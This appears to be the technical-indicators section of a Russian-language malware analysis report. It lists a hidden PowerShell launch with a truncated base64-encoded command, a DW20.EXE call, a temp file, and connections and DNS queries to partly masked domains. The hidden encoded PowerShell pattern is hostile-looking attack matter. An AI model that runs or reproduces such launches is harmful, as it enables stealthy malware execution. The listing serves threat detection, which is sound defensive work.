Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAHAAZQBoAHYAbgB1AGcAYwBpAHEAcAA9ACcASgBzAHYAcQBsAGIAYwB3AGoAYQBlAHoAdgAnADsAJABSAHEAbwB1AGEAYwBlAHAAIAA9ACAAJwA4ADcAOQAnADsAJABQAHUAeABuAG4AegB4AHcAcgB1AD0AJwBBAHAAbQBjAGgAbwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2008
- %TEMP%\916162.cvr
- 'gl######onproperties.com':443
- 'pk#.goog':80
- 'az##ea.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'gl######onproperties.com':443
- 'az##ea.com':443
- DNS ASK tr###iabds.com
- DNS ASK ka#####lothhouse.com
- DNS ASK hg###ghting.com
- DNS ASK gl######onproperties.com
- DNS ASK pk#.goog
- DNS ASK az##ea.com